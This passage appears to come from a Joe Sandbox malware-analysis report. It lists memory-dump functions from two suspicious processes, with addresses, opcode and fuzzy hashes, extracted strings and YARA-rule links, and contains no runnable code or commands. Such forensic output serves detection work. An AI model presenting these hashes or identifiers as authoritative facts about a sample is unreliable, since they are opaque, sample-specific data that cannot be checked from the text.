Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF887D67D10 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a60b056eadeb089ba4f1b1eac04991dee67e8d3e57f09444dc1d5465f7d29e3
Instruction ID: 3eda1fc1fff17143d2b0b0e54406c966e666854b6f142cfdd84148b37064a962
Opcode Fuzzy Hash: 6a60b056eadeb089ba4f1b1eac04991dee67e8d3e57f09444dc1d5465f7d29e3
Instruction Fuzzy Hash: 51D01330751D044F8B4CF73C885997473D1F76D2157954169D00FC71B5D955DC45C741

Function 00007FF887D68090 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF887D62340 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF887D63E00 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF887D61D40 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF887D66D68 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction ID: d5ed12c32eaec457ebb9ff4ee8ca2419b3863d361682079ec1126d354d4eeb27
Opcode Fuzzy Hash: d6efcf4d848245db48568154ff59c781e8c6f4a461d009a097b4ab01ece28690
Instruction Fuzzy Hash: 90D01234BA09044F870CAA38885987473A1EB6A61679541A9E00BCB2B5D96AEC89C781

Function 00007FF887D4BFFF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9b95885cbf20370d44d20922f00543ffd68689822ad91f346fa7f6e5f46571
Instruction ID: 05dbd0184bfd9d983f608f5aa051b79b9d9c7fe665dd48a3b9e25661dc0dc138
Opcode Fuzzy Hash: ed9b95885cbf20370d44d20922f00543ffd68689822ad91f346fa7f6e5f46571
Instruction Fuzzy Hash: 93E0B634D48619CFEBB1DA54D8547AC66B1BF14341F1442F6C84E972DADB386D80CF51

Function 00007FF887D30CEE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d30000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction ID: dd6242d04ce97849c19ce36e6f963bc39dfd5a37c82b12a309747b1590a09e3f
Opcode Fuzzy Hash: 76052e9d752c8258f6186f67d7a571e79ca8705db5d8e39cf9c1954a6e67b52f
Instruction Fuzzy Hash: 0EE01234A4820BCBF700DB94C4845AE7772FB51365F148365C41A8738DEE786684C780

Function 00007FF887D36DA2 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d30000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction ID: ee9e8feb70d153378380fa8e198161fba8e25b3a5c752ca46a9c467e3512a3b3
Opcode Fuzzy Hash: 109cf4fc317f816439ad66fb937f0b12f6bd0fb054e0f72f585fbb6b6806e70e
Instruction Fuzzy Hash: 0DD05E10D4C0034BFB54425494503B923B1AF55384F1812B9E90E932D5EE28AC02C614

Function 00007FF887D306A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d30000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction ID: 3c8c7a12f46d040b177e6fa5b4f15f9ad65f30043e1dc96452920b4aa72fdaeb
Opcode Fuzzy Hash: 7d63ec2320e2d576faceda0da96d24b7417a0d567c61caa7ed0dc8ede34c88ba
Instruction Fuzzy Hash: 7BC08C00EDA90F03B40471AE14020ACA122BBC4294FE80372C55F400CDFC0D20C5C196

Function 00007FF887D44D2D Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9e3cfeae857f2a54906b5c84058d06516ccade5f3cce09c3d34bb0ebc296b2
Instruction ID: 4561ce1efa857dba0b15e868a44dc4cdf6ef8404e5f99c51443ee39ed9e67e29
Opcode Fuzzy Hash: cd9e3cfeae857f2a54906b5c84058d06516ccade5f3cce09c3d34bb0ebc296b2
Instruction Fuzzy Hash: 8ED0C93094C95B8FFA89EA08D440BAD33B1BF04385F000970E80ED31DBDE68A892C741

Function 00007FF887D6BC60 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 063f168096da3e07b326ba71bd6d103cefc2a7665e2eeff64bbe61893a5e4bad
Instruction ID: 134ff038b16ac3a5debbadf378629eb73313cfdcf543302f682dd8ed702abee2
Opcode Fuzzy Hash: 063f168096da3e07b326ba71bd6d103cefc2a7665e2eeff64bbe61893a5e4bad
Instruction Fuzzy Hash: 4DC08040CD988A55D8187175185357874F0FF45360FCA0274F40D410D7EC0D248842C7

Function 00007FF887D35472 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d30000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d434060450a7285282fe326b56ce1696c2b17dbbbb30fde687eeb029923ff9
Instruction ID: 4c76382c7b5008fd024e24d1ad77c4289481379ff8b808f0a35f6a47a95d69a8
Opcode Fuzzy Hash: 78d434060450a7285282fe326b56ce1696c2b17dbbbb30fde687eeb029923ff9
Instruction Fuzzy Hash: 6BC08C01F1881742F1062298402027F08129B40B40F408034E02EC62CFCF0C5A0142C7

Function 00007FF887D48729 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65547928e0a50350be70e74bd34f565d699fdc7dfbecf0831ab40437f981688
Instruction ID: ed53f0d82fc899826dfc675ea863d38c11ad370ec8380a4b9705f52df407997b
Opcode Fuzzy Hash: d65547928e0a50350be70e74bd34f565d699fdc7dfbecf0831ab40437f981688
Instruction Fuzzy Hash: 50D0C930D045188EDBA0EA54C84079876B1BF04301F5041F6840ED3286CB39AD40CF60

Function 00007FF887D306C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d30000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction ID: 4e506ea6fed3011a212eaa031edcb949e7b7c182204628fb5be02b2d35d2b1fa
Opcode Fuzzy Hash: 416c69b68263faa0d31f89197f97f528fe9eb8365921df35813b9810f126f9ee
Instruction Fuzzy Hash: 44B01200CE644F01B40831BE084206D7060BB44148FD402B0D84E40089F84D10D44292

Function 00007FF887D6AB4A Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 964dbadd2ec588eb4cc4d91b7d9fc43cb5a1b396cb706cec7abd4c7aa22b15a6
Instruction ID: 1b77c79c96c8597be0e9ddc115c092183d74075ec850a7222dcdc1b8c86bc125
Opcode Fuzzy Hash: 964dbadd2ec588eb4cc4d91b7d9fc43cb5a1b396cb706cec7abd4c7aa22b15a6
Instruction Fuzzy Hash: 4EB01251E4484F0BB1C8642C10492FA12D3F7B8581B410234A00EC31CFFC0478524140

Non-executed Functions

Function 00007FF887D54694 Relevance: 16.4, Strings: 13, Instructions: 190COMMON

Download Yara Rule

Strings

XEL, xrefs: 00007FF887D54839
XEL, xrefs: 00007FF887D5478A
XEL, xrefs: 00007FF887D54744
XEL, xrefs: 00007FF887D54767
XEL, xrefs: 00007FF887D546FE
XEL, xrefs: 00007FF887D546DB
XEL, xrefs: 00007FF887D547AD
XEL, xrefs: 00007FF887D54695
XEL, xrefs: 00007FF887D547D0
XEL, xrefs: 00007FF887D54721
XEL, xrefs: 00007FF887D547F3
XEL, xrefs: 00007FF887D54816
XEL, xrefs: 00007FF887D546B8

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d54000_bridgenet.jbxd

Similarity

API ID:
String ID: XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL$XEL
API String ID: 0-1101732248
Opcode ID: 8d75d630b90ea973ae054abf8c399000e1e9090dd336851b5016d684db75be86
Instruction ID: 768766a15f36f29f24d4158182e76a936788b1c1c27264f34ffa4431e4c5e757
Opcode Fuzzy Hash: 8d75d630b90ea973ae054abf8c399000e1e9090dd336851b5016d684db75be86
Instruction Fuzzy Hash: 3341B466F18C5D4BE9A9A6AC542A3BC63F1FB98AD2381027AC01FC32D6DD1D5C1343C2

Function 00007FF887D309B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FF887D30B3E
c9, xrefs: 00007FF887D30B56
!k9, xrefs: 00007FF887D30B4E
"s9, xrefs: 00007FF887D30B46

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d30000_bridgenet.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: ae7be4d54837d34b414f37624e6a89064ea4a20349e4b17eea158ee605b9f326
Instruction ID: cc622070d3f773a016e1edc4b06f745d8038eabbb8addafcbf291706f69c27a8
Opcode Fuzzy Hash: ae7be4d54837d34b414f37624e6a89064ea4a20349e4b17eea158ee605b9f326
Instruction Fuzzy Hash: 88416C07E485A795E11132FEF0122ED6B549F812B9B084677E17E89183CD0CB987C6F6

Analysis Process: xvmLxyNtcnPgpmdKoWywaPsdXPf.exePID: 4600, Parent PID: 3504COMMON

Executed Functions

Function 00007FF887EA0D48 Relevance: 6.5, Strings: 5, Instructions: 262COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887EA0EA7
b4B, xrefs: 00007FF887EA0F17
r6B, xrefs: 00007FF887EA0EC5
"9B, xrefs: 00007FF887EA0DD1
5Z_H, xrefs: 00007FF887EA0DF3

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: "9B$5Z_H$b4B$r6B$r6B
API String ID: 0-3590257374
Opcode ID: 72fbfb4168c97c5db3c0525c6e8111e30c6effacd6b7755993dc5e782bbf13a5
Instruction ID: 53f3faa37f5dc47d2b5c21ce9142c036a59f571e06cb48d9c76be8a356785647
Opcode Fuzzy Hash: 72fbfb4168c97c5db3c0525c6e8111e30c6effacd6b7755993dc5e782bbf13a5
Instruction Fuzzy Hash: 2191B076918A998FE789DB68C8653ADFFF1FBA6340F4000BAC109D72D6DB781421C741

Function 00007FF887EA0E43 Relevance: 3.9, Strings: 3, Instructions: 172COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887EA0EA7
b4B, xrefs: 00007FF887EA0F17
r6B, xrefs: 00007FF887EA0EC5

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: b4B$r6B$r6B
API String ID: 0-2866943093
Opcode ID: 816e9a06deb76fab25d0ed010881ac05384591c621ddbb69d6a9483370799ee6
Instruction ID: 1f06996046885c1b1385574b67c18bde8da84382866e141998ee5cc29e817120
Opcode Fuzzy Hash: 816e9a06deb76fab25d0ed010881ac05384591c621ddbb69d6a9483370799ee6
Instruction Fuzzy Hash: F9519E76A18A598EE788DB58D8643ADFFE1FBA6750F9001BEC209D37D5CBB81421C740

Function 00007FF888244D39 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1817868969.00007FF888240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff888240000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df6b7aa21591c78f5436b6397a2b783fb94a9cadacc8aedcf6e7eaa430d77037
Instruction ID: 8cf0ee0c75a61c5d58bf66bd8b966b90b1356c9b72b8cf7b4047efd286550591
Opcode Fuzzy Hash: df6b7aa21591c78f5436b6397a2b783fb94a9cadacc8aedcf6e7eaa430d77037
Instruction Fuzzy Hash: 2AC18131A9991A8BE798EB6884A66F8B3E1FF98750F440179D40EC33D3DF286C42C755

Function 00007FF8882480F9 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF888248116

Memory Dump Source

Source File: 0000001A.00000002.1817868969.00007FF888240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff888240000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: e562a6afe1ef838582e15fe42467ece8b0e4b34dbcfcea8961330c332a83976d
Instruction ID: 4b47ee37889724edd30aa0ffd89a0c09da77cc3f4fcf16f375f504ec4fb2fc11
Opcode Fuzzy Hash: e562a6afe1ef838582e15fe42467ece8b0e4b34dbcfcea8961330c332a83976d
Instruction Fuzzy Hash: E7F0A06195A2C04FCB25AA3448594947FA0EF63240B4941EEC446CF1D3DA1C888ACB21

Function 00007FF888248339 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF888248356

Memory Dump Source

Source File: 0000001A.00000002.1817868969.00007FF888240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff888240000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 5107892cf8cb25f6ff6c5090d780785818b11b35676696f76663e3ef2488fd8c
Instruction ID: c5807ac119077d5124b79e55c470d8495115c4b59f5bb0f9e08e3c16b2c106c2
Opcode Fuzzy Hash: 5107892cf8cb25f6ff6c5090d780785818b11b35676696f76663e3ef2488fd8c
Instruction Fuzzy Hash: 3DE0127194E3C44FC755AA3484A99447F60EE6B210B8A40DEC045CF1B3D71D9845C711

Function 00007FF888247959 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF888247976

Memory Dump Source

Source File: 0000001A.00000002.1817868969.00007FF888240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff888240000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: ed142126bf49cfa7bbeb28d5171663101793038fba78f63dafd87e00f5ce786e
Instruction ID: a3f7195d35d6d8f096fda82e82d1f9453fe63af565f1cd10b59456017d670498
Opcode Fuzzy Hash: ed142126bf49cfa7bbeb28d5171663101793038fba78f63dafd87e00f5ce786e
Instruction Fuzzy Hash: DCE01A7194E7C48FCB16EB7888798447FA0AF6B250B8A41EEC045CF1B3E62D9849C701

Function 00007FF8882413E5 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1817868969.00007FF888240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff888240000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 258bc2c8f7e761b733441fadd69c0c9bbab3631f52578d8d71efe597ebf8c09a
Instruction ID: 82874ef81cecc48d234449fb514e9337e4adce576d1bae5b43cbacb107f1e845
Opcode Fuzzy Hash: 258bc2c8f7e761b733441fadd69c0c9bbab3631f52578d8d71efe597ebf8c09a
Instruction Fuzzy Hash: 30510622D4D6864FE76AD72448561F83BE0FF55290F0505BAD48EC71D3EF1C280AC3A5

Function 00007FF887EA08D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5d96386bc3f5dc8499875b8a42750047889f878608c6b7e39eda13464f238c
Instruction ID: 3e4f33971861b189607c42ede06ceeac3cf728716c01484f52cc42386e22944b
Opcode Fuzzy Hash: 7d5d96386bc3f5dc8499875b8a42750047889f878608c6b7e39eda13464f238c
Instruction Fuzzy Hash: 1F414922A4C6650BF344B7ACB0553FDB790EF953A5F4844BBD14DC71D3EE2CA8428285

Function 00007FF887EA3B90 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbd296a96446ccd828b37dc28d8e06b4d4b48ea17b7ba62ab3fb93e4f4c310a0
Instruction ID: 3e0ce68813f4b5597c5a546fd1adf2ec3bf3a5917ef2f91bb241b5cae1276f26
Opcode Fuzzy Hash: fbd296a96446ccd828b37dc28d8e06b4d4b48ea17b7ba62ab3fb93e4f4c310a0
Instruction Fuzzy Hash: E6310F31E489094AFBA4EA28C9557BCB3E2FFA4B50F5541B5D01ED3292EE2CAD45C740

Function 00007FF887EA0998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9253a886eb172a5dfacf281fc5bf2cb00fc85e91757d09260a0f63e9be232e4
Instruction ID: f6e80c3867cf2ffc77e1b73b6c9fe0668b811b562b833c860827782ea68f436d
Opcode Fuzzy Hash: a9253a886eb172a5dfacf281fc5bf2cb00fc85e91757d09260a0f63e9be232e4
Instruction Fuzzy Hash: 85210721B58A190FE798B66C94597BDF3D6FBA9791F4040BAE40DC32D2DE2C9C418281

Function 00007FF887EA0C25 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abb0ea93bccee3e7fab43968e42a9bc15e8a803e35149dc85b95f318945ae4a5
Instruction ID: 3715ccac3d32061879c901268ef5ca2931f8f4f4011006de61562178a5039cdd
Opcode Fuzzy Hash: abb0ea93bccee3e7fab43968e42a9bc15e8a803e35149dc85b95f318945ae4a5
Instruction Fuzzy Hash: 1D21F736A0C65A9FE702AB68D9411ECBB70FF913A5F1481B3D158CB1C3E93C654AC781

Function 00007FF887EA0C38 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 923824f4f5e805b25ea483c1fef557ce52e1939c492ecebe9e993d758eab9042
Instruction ID: b7f01c373e8d263b2d54e1e57c70cbc3a53fd862209de6e0b35c58bd29f2ed1f
Opcode Fuzzy Hash: 923824f4f5e805b25ea483c1fef557ce52e1939c492ecebe9e993d758eab9042
Instruction Fuzzy Hash: 62118235A4C65A9FE702DB78C9401DCBBB0FF62794F1545B6C054DB192E93C664AC780

Function 00007FF887EA0C40 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c854b6733f8eddbee1e48ba5f98074121d95b96fb21959b4a863dded951ee982
Instruction ID: 99a0e525e03f9028e50301e1022a09e624234f4e2a24c53843477ec70d6f8fc2
Opcode Fuzzy Hash: c854b6733f8eddbee1e48ba5f98074121d95b96fb21959b4a863dded951ee982
Instruction Fuzzy Hash: 48018035A0C68A9FE702DB78C9541DCBFB0FF62394F1545F6C055DB292EA386649CB80

Function 00007FF887EA417E Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d8d1227c3cb05ba8bb2ec677f708a65b82739a91600eedc3bf5e87aeddcd11
Instruction ID: d22da9cdcf0acc0949d14ca824c0330a3f0073c04ed45798122d27e166d51176
Opcode Fuzzy Hash: f1d8d1227c3cb05ba8bb2ec677f708a65b82739a91600eedc3bf5e87aeddcd11
Instruction Fuzzy Hash: 37014070648A198FDB84EB08C594EBDB3B1FB69350F1041A9D50ED32A0CE38A944CF41

Function 00007FF887EA0C48 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1810377311.00007FF887EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887ea0000_xvmLxyNtcnPgpmdKoWywaPsdXPf.jbxd

Similarity

API ID:
